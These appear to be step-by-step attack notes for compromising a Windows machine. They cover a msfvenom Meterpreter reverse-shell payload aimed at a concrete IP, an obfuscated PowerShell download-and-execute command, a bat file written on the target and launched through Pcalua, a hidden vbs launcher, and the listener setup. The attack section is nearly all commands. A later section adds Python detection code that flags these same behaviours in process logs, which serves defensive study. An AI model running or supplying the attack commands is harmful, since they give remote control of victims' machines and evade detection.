I. Loading shellcode with Pcalua
1. Generate the shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1
2. Obfuscation
powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.ps1'')) ';IEX ($a+$b)"
3. Write the bat file on the target machine
type nul > 1.bat
echo powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.ps1'')) ';IEX ($a+$b)"> 1.bat
4. Set up the listener in msf
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 39.104.56.140
set LPORT 7100
exploit
5. Run 1.bat with Pcalua from cmd
Pcalua -m -a 1.bat
II. PowerShell obfuscation
1.
powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://x.X.X.X:7200/a.ps1''))';IEX ($a+$b)"
2. Running the bat through a vbs file does not pop up a cmd window
3. The vbs file
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c start.bat",vbhide
4. End
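
On the detection side, the three behaviours in these notes (Pcalua -a launching a bat, the downloadstring cradle whose URL is split across $a and $b, and a script host starting cmd hidden) can be matched in process-creation logs. The following is an added example, not part of the original notes: the event field names, rule labels and sample events are assumptions constructed for illustration, and 192.0.2.10 is a documentation address.

```python
import re

# $name='literal' assignments; '' inside a literal is an escaped quote.
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
# IEX ($a+$b+...): Invoke-Expression over concatenated variables.
CONCAT = re.compile(r"(?:iex|invoke-expression)\s*\(\s*(\$\w+(?:\s*\+\s*\$\w+)*)\s*\)", re.I)
CRADLE = re.compile(r"downloadstring\(\s*'(https?://[^']+)'", re.I)
PCALUA_A = re.compile(r"(?:^|\s)-a\s+(\S+)", re.I)

def base(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]

def rebuild(cmdline):
    """Return the string each IEX ($x+$y...) would evaluate, from literal assignments."""
    lits = {m.group(1).lower(): m.group(2).replace("''", "'")
            for m in ASSIGN.finditer(cmdline)}
    return ["".join(lits.get(n.lower(), "") for n in re.findall(r"\$(\w+)", m.group(1)))
            for m in CONCAT.finditer(cmdline)]

def findings(event):
    image, parent, cmd = base(event["image"]), base(event["parent"]), event["cmdline"]
    hits = []
    m = PCALUA_A.search(cmd)
    if image == "pcalua.exe" and m:              # Pcalua used to launch another file
        hits.append("pcalua-proxy-exec:" + m.group(1))
    if image in ("powershell.exe", "pwsh.exe"):  # raw text first, then rebuilt strings
        for text in [cmd] + rebuild(cmd):
            m = CRADLE.search(text)
            if m:
                hits.append("download-cradle:" + m.group(1))
                break
    if image in ("cmd.exe", "powershell.exe") and parent in ("wscript.exe", "cscript.exe"):
        hits.append("script-host-spawned-shell")
    return hits

# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"image": r"C:\Windows\System32\pcalua.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "Pcalua -m -a 1.bat"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'''powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://192.0.2.10:7200/a.ps1'')) ';IEX ($a+$b)"'''},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "cmd /c start.bat"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell -NoProfile -Command Get-ChildItem"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(base(e["image"]), findings(e))
```

A plain search for "http://" in the raw command line misses the second event because the literal is split; the URL only appears once the $a+$b concatenation is rebuilt.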